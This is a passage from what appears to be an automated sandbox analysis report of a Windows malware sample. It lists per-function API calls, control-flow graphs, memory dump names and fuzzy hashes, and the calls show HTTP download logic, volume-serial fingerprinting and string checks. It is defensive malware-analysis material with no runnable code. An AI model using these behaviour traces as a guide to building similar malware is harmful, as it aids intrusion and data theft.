                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035F239
                                  • lstrcpy.KERNEL32(00000000,00374FA0), ref: 0035F25E
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035F28C
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035F2C0
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035F2F0
                                  • lstrlen.KERNEL32(00F96500), ref: 0035F315
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: c93537c7b17b09a20051994426472c82d0fb3e4459d833084a843d3e7943fbab
                                  • Instruction ID: b6013b93e4e99e8534298d39b51e51c0f6a04d9e582bf26ceabdd794aa7a6677
                                  • Opcode Fuzzy Hash: c93537c7b17b09a20051994426472c82d0fb3e4459d833084a843d3e7943fbab
                                  • Instruction Fuzzy Hash: B1A28E709012029FCB22DF65D848E6ABBF5AF44311F5A8479EC09DB361EB31DC59DBA0
                                  Function 0035FFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00360013
                                  • lstrlen.KERNEL32(0036CFEC), ref: 003600BD
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003600E1
                                  • lstrlen.KERNEL32(0036CFEC), ref: 003600EC
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00360110
                                  • lstrlen.KERNEL32(0036CFEC), ref: 0036011B
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0036013F
                                  • lstrlen.KERNEL32(0036CFEC), ref: 0036015A
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00360189
                                  • lstrlen.KERNEL32(0036CFEC), ref: 00360194
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003601C3
                                  • lstrlen.KERNEL32(0036CFEC), ref: 003601CE
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00360206
                                  • lstrlen.KERNEL32(0036CFEC), ref: 00360250
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00360288
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0036059B
                                  • lstrlen.KERNEL32(00F96580), ref: 003605AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003605D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 003605E3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0036060E
                                  • lstrlen.KERNEL32(00FADD90), ref: 00360625
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0036064C
                                  • lstrcat.KERNEL32(00000000,?), ref: 00360658
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00360681
                                  • lstrlen.KERNEL32(00F96320), ref: 00360698
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003606C9
                                  • lstrcat.KERNEL32(00000000,?), ref: 003606D5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00360706
                                  • lstrcpy.KERNEL32(00000000,00FA8AE8), ref: 0036074B
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341557
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341579
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 0034159B
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 003415FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0036077F
                                  • lstrcpy.KERNEL32(00000000,00FADDC0), ref: 003607E7
                                  • lstrcpy.KERNEL32(00000000,00FA8958), ref: 00360858
                                  • lstrcpy.KERNEL32(00000000,fplugins), ref: 003608CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00360928
                                  • lstrcpy.KERNEL32(00000000,00FA8858), ref: 003609F8
                                    • Part of subcall function 003424E0: lstrcpy.KERNEL32(00000000,?), ref: 00342528
                                    • Part of subcall function 003424E0: lstrcpy.KERNEL32(00000000,?), ref: 0034254E
                                    • Part of subcall function 003424E0: lstrcpy.KERNEL32(00000000,?), ref: 00342577
                                  • lstrcpy.KERNEL32(00000000,00FA88E8), ref: 00360ACE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00360B81
                                  • lstrcpy.KERNEL32(00000000,00FA88E8), ref: 00360D58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID: fplugins
                                  • API String ID: 2500673778-38756186
                                  • Opcode ID: 0ffc3ace51001e4205ed874ce447f96e313e39092a09925f38032dbf3f2a6036
                                  • Instruction ID: f7bdbb389d63326ff43c17c773d494c841d07bc6979f9d696c72784271182042
                                  • Opcode Fuzzy Hash: 0ffc3ace51001e4205ed874ce447f96e313e39092a09925f38032dbf3f2a6036
                                  • Instruction Fuzzy Hash: 5EE26970A053418FC736DF29C489B6ABBE0BF89304F59C96DE48D8B366DB319845CB52
                                  Function 00346C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2234 346c40-346c64 call 342930 2237 346c75-346c97 call 344bc0 2234->2237 2238 346c66-346c6b 2234->2238 2242 346c99 2237->2242 2243 346caa-346cba call 342930 2237->2243 2238->2237 2239 346c6d-346c6f lstrcpy 2238->2239 2239->2237 2245 346ca0-346ca8 2242->2245 2247 346cbc-346cc2 lstrcpy 2243->2247 2248 346cc8-346cf5 InternetOpenA StrCmpCA 2243->2248 2245->2243 2245->2245 2247->2248 2249 346cf7 2248->2249 2250 346cfa-346cfc 2248->2250 2249->2250 2251 346d02-346d22 InternetConnectA 2250->2251 2252 346ea8-346ebb call 342930 2250->2252 2253 346ea1-346ea2 InternetCloseHandle 2251->2253 2254 346d28-346d5d HttpOpenRequestA 2251->2254 2261 346ebd-346ebf 2252->2261 2262 346ec9-346ee0 call 342a20 * 2 2252->2262 2253->2252 2256 346e94-346e9e InternetCloseHandle 2254->2256 2257 346d63-346d65 2254->2257 2256->2253 2259 346d67-346d77 InternetSetOptionA 2257->2259 2260 346d7d-346dad HttpSendRequestA HttpQueryInfoA 2257->2260 2259->2260 2264 346dd4-346de4 call 363d90 2260->2264 2265 346daf-346dd3 call 3671e0 call 342a20 * 2 2260->2265 2261->2262 2266 346ec1-346ec3 lstrcpy 2261->2266 2264->2265 2274 346de6-346de8 2264->2274 2266->2262 2277 346e8d-346e8e InternetCloseHandle 2274->2277 2278 346dee-346e07 InternetReadFile 2274->2278 2277->2256 2278->2277 2280 346e0d 2278->2280 2282 346e10-346e15 2280->2282 2282->2277 2283 346e17-346e3d call 367310 2282->2283 2286 346e44-346e51 call 342930 2283->2286 2287 346e3f call 342a20 2283->2287 2291 346e61-346e8b call 342a20 InternetReadFile 2286->2291 2292 346e53-346e57 2286->2292 2287->2286 2291->2277 2291->2282 2292->2291 2293 346e59-346e5b lstrcpy 2292->2293 2293->2291
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00346C6F
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00346CC2
                                  • InternetOpenA.WININET(0036CFEC,00000001,00000000,00000000,00000000), ref: 00346CD5
                                  • StrCmpCA.SHLWAPI(?,00FAE3C0), ref: 00346CED
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00346D15
                                  • HttpOpenRequestA.WININET(00000000,GET,?,00FADE20,00000000,00000000,-00400100,00000000), ref: 00346D50
                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00346D77
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00346D86
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00346DA5
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00346DFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00346E5B
                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00346E7D
                                  • InternetCloseHandle.WININET(00000000), ref: 00346E8E
                                  • InternetCloseHandle.WININET(?), ref: 00346E98
                                  • InternetCloseHandle.WININET(00000000), ref: 00346EA2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00346EC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                  • String ID: ERROR$GET
                                  • API String ID: 3687753495-3591763792
                                  • Opcode ID: c56a71df36e08cc7daa74a7ae489cb320e9a08732e9ba38d870c91c00bde0ca1
                                  • Instruction ID: acbeb76b3656ddc3c91b0c8850bb7b96e53c15470685685218c7fc34ad057d82
                                  • Opcode Fuzzy Hash: c56a71df36e08cc7daa74a7ae489cb320e9a08732e9ba38d870c91c00bde0ca1
                                  • Instruction Fuzzy Hash: C6817F71A50215ABDB21DFA4DC4AFAE77F8EF45700F154068F909EB280DB70BD449BA1
                                  Function 0035F2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00F96500), ref: 0035F315
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035F3A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035F3C7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035F47B
                                  • lstrcpy.KERNEL32(00000000,00F96500), ref: 0035F4BB
                                  • lstrcpy.KERNEL32(00000000,00FA8AD8), ref: 0035F4EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035F59E
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0035F61C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035F64C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035F69A
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 0035F718
                                  • lstrlen.KERNEL32(00FA8B48), ref: 0035F746
                                  • lstrcpy.KERNEL32(00000000,00FA8B48), ref: 0035F771
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035F793
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035F7E4
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 0035FA32
                                  • lstrlen.KERNEL32(00FA8A58), ref: 0035FA60
                                  • lstrcpy.KERNEL32(00000000,00FA8A58), ref: 0035FA8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035FAAD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035FAFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: 1f3fff8967030d89bb35296dd76a995b8d2b9ffc9235a68d3af6b06c822c7b01
                                  • Instruction ID: 22842f61f14872075ca338cf58eef8c07f7bc2394b5b16a3013e4b6ff250bd0d
                                  • Opcode Fuzzy Hash: 1f3fff8967030d89bb35296dd76a995b8d2b9ffc9235a68d3af6b06c822c7b01
                                  • Instruction Fuzzy Hash: E4F13B70A01202CFDB26CF29D848E66B7F5BF54316B5A80B9D8099B271D731DC8ADB90
                                  Function 00358CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2721 358ca0-358cc4 StrCmpCA 2722 358cc6-358cc7 ExitProcess 2721->2722 2723 358ccd-358ce6 2721->2723 2725 358ee2-358eef call 342a20 2723->2725 2726 358cec-358cf1 2723->2726 2727 358cf6-358cf9 2726->2727 2729 358ec3-358edc 2727->2729 2730 358cff 2727->2730 2729->2725 2770 358cf3 2729->2770 2732 358e56-358e64 StrCmpCA 2730->2732 2733 358d30-358d3f lstrlen 2730->2733 2734 358dbd-358dcb StrCmpCA 2730->2734 2735 358ddd-358deb StrCmpCA 2730->2735 2736 358dfd-358e0b StrCmpCA 2730->2736 2737 358e1d-358e2b StrCmpCA 2730->2737 2738 358e3d-358e4b StrCmpCA 2730->2738 2739 358d5a-358d69 lstrlen 2730->2739 2740 358d84-358d92 StrCmpCA 2730->2740 2741 358da4-358db8 StrCmpCA 2730->2741 2742 358d06-358d15 lstrlen 2730->2742 2743 358e6f-358e7d StrCmpCA 2730->2743 2744 358e88-358e9a lstrlen 2730->2744 2732->2729 2752 358e66-358e6d 2732->2752 2756 358d41-358d46 call 342a20 2733->2756 2757 358d49-358d55 call 342930 2733->2757 2734->2729 2745 358dd1-358dd8 2734->2745 2735->2729 2746 358df1-358df8 2735->2746 2736->2729 2747 358e11-358e18 2736->2747 2737->2729 2748 358e31-358e38 2737->2748 2738->2729 2749 358e4d-358e54 2738->2749 2758 358d73-358d7f call 342930 2739->2758 2759 358d6b-358d70 call 342a20 2739->2759 2740->2729 2761 358d98-358d9f 2740->2761 2741->2729 2750 358d17-358d1c call 342a20 2742->2750 2751 358d1f-358d2b call 342930 2742->2751 2743->2729 2753 358e7f-358e86 2743->2753 2754 358ea4-358eb0 call 342930 2744->2754 2755 358e9c-358ea1 call 342a20 2744->2755 2745->2729 2746->2729 2747->2729 2748->2729 2749->2729 2750->2751 2779 358eb3-358eb5 2751->2779 2752->2729 2753->2729 2754->2779 2755->2754 2756->2757 2757->2779 2758->2779 2759->2758 2761->2729 2770->2727 2779->2729 2780 358eb7-358eb9 2779->2780 2780->2729 2781 358ebb-358ebd lstrcpy 2780->2781 2781->2729
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 0aeeea82d31bc3e20b42742a766709dfb21b9d732df0f260d5d997f89455d65d
                                  • Instruction ID: b95e333442ad0049198ec7b42de0e42bc9d11c707926bca35abcc4f1a836d94e
                                  • Opcode Fuzzy Hash: 0aeeea82d31bc3e20b42742a766709dfb21b9d732df0f260d5d997f89455d65d
                                  • Instruction Fuzzy Hash: 50518170904701EFC7239F75EC89E6B77F8BB15701B10481DF846E6620DB78E849AB61
                                  Function 00362740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2782 362740-362783 GetWindowsDirectoryA 2783 362785 2782->2783 2784 36278c-3627ea GetVolumeInformationA 2782->2784 2783->2784 2785 3627ec-3627f2 2784->2785 2786 3627f4-362807 2785->2786 2787 362809-362820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 362826-362844 wsprintfA 2787->2788 2789 362822-362824 2787->2789 2790 36285b-362872 call 3671e0 2788->2790 2789->2790
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0036277B
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,003593B6,00000000,00000000,00000000,00000000), ref: 003627AC
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0036280F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00362816
                                  • wsprintfA.USER32 ref: 0036283B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                  • String ID: :\$C
                                  • API String ID: 2572753744-3309953409
                                  • Opcode ID: 8b33f9e69bb25ac64f3fb03db0cee6d74af95ee2853ca37b349af3bf72169804
                                  • Instruction ID: 128e346dd2afaf361e3c0e669e5b45d2d9c01524a3aaa42e6b3a6ed9c877c006
                                  • Opcode Fuzzy Hash: 8b33f9e69bb25ac64f3fb03db0cee6d74af95ee2853ca37b349af3bf72169804
                                  • Instruction Fuzzy Hash: DA318DB1D482099FCB05CFB89D899EFBFBCEF58710F10416AE509F7654E6348A408BA1
                                  Function 00344BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2793 344bc0-344bce 2794 344bd0-344bd5 2793->2794 2794->2794 2795 344bd7-344c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 342a20 2794->2795
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00344BF7
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00344C01
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00344C0B
                                  • lstrlen.KERNEL32(?,00000000,?), ref: 00344C1F
                                  • InternetCrackUrlA.WININET(?,00000000), ref: 00344C27
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
